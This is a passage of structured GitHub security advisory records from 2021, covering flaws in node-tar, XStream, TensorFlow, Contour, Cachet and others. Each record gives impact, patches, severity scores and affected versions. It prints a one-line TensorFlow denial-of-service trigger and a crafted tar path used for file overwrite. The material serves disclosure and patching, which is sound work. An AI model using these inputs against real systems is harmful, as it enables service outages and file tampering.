'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.4.16'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.8'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ecosystem_specific': {'affected_functions': ['tar.Unpack']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/node-tar/security/advisories/GHSA-9r2w-394v-53qc'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37701'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/node-tar'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2022/12/msg00023.html'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5008'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/tar'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-22', 'CWE-59'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-31T16:01:50Z', 'nvd_published_at': '2021-08-31T17:15:00Z'}" +1.4.0,GHSA-p8pq-r894-fm8f,2022-02-08T21:00:18Z,2021-08-25T14:47:57Z,,['CVE-2021-39146'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39146](https://x-stream.github.io/CVE-2021-39146.html). + +### Credits +Ceclin and YXXX from the Tencent Security Response Center found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-p8pq-r894-fm8f'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39146'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39146.html'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:13Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-3ccq-5vw3-2p6x,2022-02-08T20:44:12Z,2021-08-25T14:47:28Z,,['CVE-2021-39149'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39149](https://x-stream.github.io/CVE-2021-39149.html). + +### Credits +Lai Han of NSFOCUS security team found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-3ccq-5vw3-2p6x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39149'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39149.html'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:21Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-j42v-6wpm-r847,2021-08-19T18:55:21Z,2021-08-25T20:50:26Z,,['CVE-2020-35927'],Data races in thex,An issue was discovered in the thex crate through 2020-12-08 for Rust. Thex allows cross-thread data races of non-Send types.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'thex'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-35927'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0090.html'}]","{'cwe_ids': ['CWE-662'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T18:55:21Z', 'nvd_published_at': None}" +1.4.0,GHSA-88f9-7xxh-c688,2022-08-16T18:38:53Z,2021-08-30T16:11:43Z,,['CVE-2021-39174'],Cachet configuration leak,"### Impact + +Authenticated users, regardless of their privileges (_User_ or _Admin_), can leak the value of any configuration entry of the dotenv file, e.g. the application secret (`APP_KEY`) and various passwords (email, database, etc). + +### Patches + +This issue was addressed by improving `UpdateConfigCommandHandler` and preventing the use of nested variables in the resulting dotenv configuration file. + +### Workarounds + +Only allow trusted source IP addresses to access to the administration dashboard. + +### References + +Further technical details are available at [https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection](https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection). + +### For more information + +If you have any questions or comments about this advisory, you can contact: +- The original reporters, by sending an email to vulnerability.research [at] sonarsource.com; +- The maintainers, by opening an issue on this repository. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cachethq/cachet'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.5.1'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.0'}}]","[{'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/security/advisories/GHSA-88f9-7xxh-c688'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39174'}, {'type': 'WEB', 'url': 'https://blog.sonarsource.com/cachet-code-execution-via-laravel-configuration-injection'}, {'type': 'PACKAGE', 'url': 'https://github.com/cachethq/Cachet'}, {'type': 'WEB', 'url': 'https://github.com/fiveai/Cachet/releases/tag/v2.5.1'}]","{'cwe_ids': ['CWE-75'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T23:34:07Z', 'nvd_published_at': '2021-08-28T00:15:00Z'}" +1.4.0,GHSA-3jfq-g458-7qm9,2021-08-30T23:14:50Z,2021-08-03T19:06:36Z,,['CVE-2021-32804'],Arbitrary File Creation/Overwrite due to insufficient absolute path sanitization,"### Impact + +Arbitrary File Creation, Arbitrary File Overwrite, Arbitrary Code Execution + +`node-tar` aims to prevent extraction of absolute file paths by turning absolute paths into relative paths when the `preservePaths` flag is not set to `true`. This is achieved by stripping the absolute path root from any absolute file paths contained in a tar file. For example `/home/user/.bashrc` would turn into `home/user/.bashrc`. + +This logic was insufficient when file paths contained repeated path roots such as `////home/user/.bashrc`. `node-tar` would only strip a single path root from such paths. When given an absolute file path with repeating path roots, the resulting path (e.g. `///home/user/.bashrc`) would still resolve to an absolute path, thus allowing arbitrary file creation and overwrite. + +### Patches + +3.2.2 || 4.4.14 || 5.0.6 || 6.1.1 + +NOTE: an adjacent issue [CVE-2021-32803](https://github.com/npm/node-tar/security/advisories/GHSA-r628-mhmh-qjhw) affects this release level. Please ensure you update to the latest patch levels that address CVE-2021-32803 as well if this adjacent issue affects your `node-tar` use case. + +### Workarounds + +Users may work around this vulnerability without upgrading by creating a custom `onentry` method which sanitizes the `entry.path` or a `filter` method which removes entries with absolute paths. + +```js +const path = require('path') +const tar = require('tar') + +tar.x({ + file: 'archive.tgz', + // either add this function... + onentry: (entry) => { + if (path.isAbsolute(entry.path)) { + entry.path = sanitizeAbsolutePathSomehow(entry.path) + entry.absolute = path.resolve(entry.path) + } + }, + + // or this one + filter: (file, entry) => { + if (path.isAbsolute(entry.path)) { + return false + } else { + return true + } + } +}) +``` + +Users are encouraged to upgrade to the latest patch versions, rather than attempt to sanitize tar input themselves.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.2.2'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.14'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.0.6'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '6.0.0'}, {'fixed': '6.1.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/npm/node-tar/security/advisories/GHSA-3jfq-g458-7qm9'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-32804'}, {'type': 'WEB', 'url': 'https://github.com/npm/node-tar/commit/1f036ca23f64a547bdd6c79c1a44bc62e8115da4'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/node-tar'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/advisories/1770'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/tar'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuoct2021.html'}]","{'cwe_ids': ['CWE-22'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-03T19:06:15Z', 'nvd_published_at': '2021-08-03T19:15:00Z'}" +1.4.0,GHSA-6w62-hx7r-mw68,2022-02-08T20:43:47Z,2021-08-25T14:46:38Z,,['CVE-2021-39154'],XStream is vulnerable to an Arbitrary Code Execution attack,"### Impact +The vulnerability may allow a remote attacker to load and execute arbitrary code from a remote host only by manipulating the processed input stream. No user is affected, who followed the recommendation to setup XStream's security framework with a whitelist limited to the minimal required types. + +### Patches +XStream 1.4.18 uses no longer a blacklist by default, since it cannot be secured for general purpose. + +### Workarounds +See [workarounds](https://x-stream.github.io/security.html#workaround) for the different versions covering all CVEs. + +### References +See full information about the nature of the vulnerability and the steps to reproduce it in XStream's documentation for [CVE-2021-39154](https://x-stream.github.io/CVE-2021-39154.html). + +### Credits +ka1n4t found and reported the issue to XStream and provided the required information to reproduce it. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [XStream](https://github.com/x-stream/xstream/issues) +* Contact us at [XStream Google Group](https://groups.google.com/group/xstream-user) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.thoughtworks.xstream:xstream'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.18'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/x-stream/xstream/security/advisories/GHSA-6w62-hx7r-mw68'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-39154'}, {'type': 'PACKAGE', 'url': 'https://github.com/x-stream/xstream'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/22KVR6B5IZP3BGQ3HPWIO2FWWCKT3DHP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PVPHZA7VW2RRSDCOIPP2W6O5ND254TU7/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QGXIU3YDPG6OGTDHMBLAFN7BPBERXREB/'}, {'type': 'WEB', 'url': 'https://security.netapp.com/advisory/ntap-20210923-0003/'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2021/dsa-5004'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuapr2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujan2022.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpujul2022.html'}, {'type': 'WEB', 'url': 'https://x-stream.github.io/CVE-2021-39154.html'}]","{'cwe_ids': ['CWE-434', 'CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T18:22:35Z', 'nvd_published_at': '2021-08-23T18:15:00Z'}" +1.4.0,GHSA-6wp2-fw3v-mfmc,2021-08-24T18:54:26Z,2021-08-25T20:57:19Z,,['CVE-2020-36452'],Memory corruption in array-tools,"An issue was discovered in the array-tools crate before 0.3.2 for Rust. Affected versions of this crate don't guard against panics, so that partially uninitialized buffer is dropped when user-provided `T::clone()` panics in `FixedCapacityDequeLike::clone()`. This causes memory corruption. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'array-tools'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-36452'}, {'type': 'WEB', 'url': 'https://github.com/L117/array-tools/issues/2'}, {'type': 'PACKAGE', 'url': 'https://github.com/L117/array-tools'}, {'type': 'WEB', 'url': 'https://raw.githubusercontent.com/rustsec/advisory-db/main/crates/array-tools/RUSTSEC-2020-0132.md'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0132.html'}]","{'cwe_ids': ['CWE-908', 'CWE-909'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-08-18T20:24:55Z', 'nvd_published_at': '2021-08-08T06:15:00Z'}" +1.4.0,GHSA-r6g8-jmj9-g945,2021-08-27T12:54:01Z,2021-08-30T16:22:16Z,,['CVE-2021-3734'],Improper Restriction of Rendered UI Layers or Frames in yourls,yourls is vulnerable to Improper Restriction of Rendered UI Layers or Frames,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'yourls/yourls'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-3734'}, {'type': 'WEB', 'url': 'https://github.com/yourls/yourls/commit/0a70acdcfb5fcbc63dbc5750018d608288eba3fe'}, {'type': 'PACKAGE', 'url': 'https://github.com/yourls/yourls'}, {'type': 'WEB', 'url': 'https://huntr.dev/bounties/dd2e2dbe-efe5-49ec-be11-7a7e7c41debd'}]","{'cwe_ids': ['CWE-1021', 'CWE-352'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-27T12:54:01Z', 'nvd_published_at': '2021-08-26T13:15:00Z'}" +1.4.0,GHSA-r6mv-ppjc-4hgr,2023-04-25T16:37:22Z,2021-08-23T19:41:04Z,,['CVE-2021-37626'],PHP file inclusion via insert tags,"### Impact + +It is possible for untrusted users to load arbitrary PHP files via insert tags. + +Installations are only affected if there are untrusted back end users. + +### Patches + +Update to Contao 4.4.56, 4.9.18 or 4.11.7. + +### Workarounds + +Disable the login for untrusted back end users. + +### References + +https://contao.org/en/security-advisories/php-file-inclusion-via-insert-tags + +### For more information + +If you have any questions or comments about this advisory, open an issue in [contao/contao](https://github.com/contao/contao/issues/new/choose).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0'}, {'fixed': '4.4.56'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.5.0'}, {'fixed': '4.9.18'}]}]}, {'package': {'ecosystem': 'Packagist', 'name': 'contao/core-bundle'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.10.0'}, {'fixed': '4.11.7'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/contao/contao/security/advisories/GHSA-r6mv-ppjc-4hgr'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37626'}, {'type': 'WEB', 'url': 'https://contao.org/en/security-advisories/php-file-inclusion-via-insert-tags.html'}, {'type': 'PACKAGE', 'url': 'https://github.com/contao/contao'}]","{'cwe_ids': ['CWE-94'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-23T16:51:34Z', 'nvd_published_at': '2021-08-11T23:15:00Z'}" +1.4.0,GHSA-x54v-qxxr-93qc,2023-06-13T20:38:08Z,2021-08-25T20:45:01Z,,['CVE-2020-25795'],Missing release of memory in sized-chunks,"Chunk: + +* Array size is not checked when constructed with unit() and pair(). +* Array size is not checked when constructed with From>. +* Clone and insert_from are not panic-safe; A panicking iterator causes memory safety issues with them. + +InlineArray: + +* Generates unaligned references for types with a large alignment requirement. +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'crates.io', 'name': 'sized-chunks'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.6.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-25795'}, {'type': 'WEB', 'url': 'https://github.com/bodil/sized-chunks/issues/11'}, {'type': 'PACKAGE', 'url': 'https://github.com/bodil/sized-chunks'}, {'type': 'WEB', 'url': 'https://rustsec.org/advisories/RUSTSEC-2020-0041.html'}]","{'cwe_ids': ['CWE-401'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-08-19T21:21:52Z', 'nvd_published_at': '2020-09-19T21:15:00Z'}" +1.4.0,GHSA-2wmv-37vq-52g5,2021-08-24T14:19:36Z,2021-08-25T14:42:06Z,,['CVE-2021-37668'],FPE in `tf.raw_ops.UnravelIndex`,"### Impact +An attacker can cause denial of service in applications serving models using `tf.raw_ops.UnravelIndex` by triggering a division by 0: + +```python +import tensorflow as tf + +tf.raw_ops.UnravelIndex(indices=-1, dims=[1,0,2]) +``` + +The [implementation](https://github.com/tensorflow/tensorflow/blob/460e000de3a83278fb00b61a16d161b1964f15f4/tensorflow/core/kernels/unravel_index_op.cc#L36) does not check that the tensor subsumed by `dims` is not empty. Hence, if one element of `dims` is 0, the implementation does a division by 0. + +### Patches +We have patched the issue in GitHub commit [a776040a5e7ebf76eeb7eb923bf1ae417dd4d233](https://github.com/tensorflow/tensorflow/commit/a776040a5e7ebf76eeb7eb923bf1ae417dd4d233). + +The fix will be included in TensorFlow 2.6.0. We will also cherrypick this commit on TensorFlow 2.5.1, TensorFlow 2.4.3, and TensorFlow 2.3.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.5.0'}, {'fixed': '2.5.1'}]}], 'versions': ['2.5.0']}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-2wmv-37vq-52g5'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-37668'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/a776040a5e7ebf76eeb7eb923bf1ae417dd4d233'}, {'type': 'PACKAGE', 'url': 'https://github.com/tensorflow/tensorflow'}]","{'cwe_ids': ['CWE-369'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-08-24T14:19:36Z', 'nvd_published_at': '2021-08-12T23:15:00Z'}" +1.4.0,GHSA-5ph6-qq5x-7jwc,2021-08-30T16:53:38Z,2021-08-30T17:22:10Z,,['CVE-2021-32783'],ExternalName Services can be used to gain access to Envoy's admin interface,"### Impact +Josh Ferrell (@josh-ferrell) from VMware has reported that a specially crafted ExternalName type Service may be used to access Envoy's admin interface, which Contour normally prevents from access outside the Envoy container. This can be used to shut down Envoy remotely (a denial of service), or to expose the existence of any Secret that Envoy is using for its configuration, including most notably TLS Keypairs. However, it *cannot* be used to get the *content* of those secrets. + +Since this attack allows access to the administration interface, a variety of administration options are available, such as shutting down the Envoy or draining traffic. In general, the Envoy admin interface cannot easily be used for making changes to the cluster, in-flight requests, or backend services, but it could be used to shut down or drain Envoy, change traffic routing, or to retrieve secret metadata, as mentioned above. + +### Patches +The issue will be addressed in the forthcoming Contour v1.18.0 and a patch release, v1.17.1, has been released in the meantime. + +It is addressed in two ways: +- disabling ExternalName type Services by default +- When ExternalName Services are enabled, block obvious ""localhost"" entries. + +#### Disable ExternalName type Services by default + +This change prohibits processing of ExternalName services unless the cluster operator specifically allows them using the new `--enable-externalname` flag or equivalent configuration file setting. This is a breaking change for previous versions of Contour, which is unfortunate, but necessary because of the severity of the information exposed in this advisory. + + +#### Block obvious `localhost` entries for enabled ExternalName Services + +As part of this change set, we have added a filter in the event that operators *do* enable ExternalName Services, such that obvious `localhost` entries are rejected by Contour. + +There are a number of problems with this method, however: +- This is a porous control. As long as you control a domain name, it's trivially easy to add a DNS entry for any name you like that redirects to `127.0.0.1` or `::1`. Contour even provides `local.projectcontour.io` ourselves for testing and example purposes. (This name is, of course, included in the ""obvious localhost entries"" list.) So we can never totally stop this exploit as long as the admin interface is accessible on localhost, which, according to envoyproxy/envoy#2763, will be for some time if not forever. The best we can do is block some obvious elements, but this is always a risk for a motivated attacker. +- We've actually suggested using `localhost` ExternalName Services in the past, to allow people to connect to sidecar External Authentication services in their cluster. Both of these changes break this use-case, but given that it's about something that has security requirements high enough to require authentication, it's important to ensure that people are opting in. For the External Auth sidecar case, we are investigating an update to ExtensionService that will help with the sidecar use case. + +### Workarounds +Not easily. It's not possible to control the creation of ExternalName Services with RBAC without the use of Gatekeeper or other form of admission control, and the creation of services is required for Contour to actually work for application developer personas. + +### For more information +Exploit code will be published at a later date for this vulnerability, once our users have had a chance to upgrade.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/projectcontour/contour'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.14.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/projectcontour/contour'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.15.0'}, {'fixed': '1.15.2'}]}]}, {'package': {'ecosystem': 'Go', 'name': 'github.com/projectcontour/contour'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.16.0'}, {'fixed': '1.16.1'}]}], 'versions': ['1.16.0']}, {'package': {'ecosystem': 'Go', 'name': 'github.com/projectcontour/contour'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.17.0'}, {'fixed': '1.17.1'}]}], 'versions': ['1.17.0']}]","[{'type': 'WEB', 'url': 'https://github.com/projectcontour/contour/security/advisories/GHSA-5ph6-qq5x-7jwc'}, {'type': 'ADVISORY', 'url': 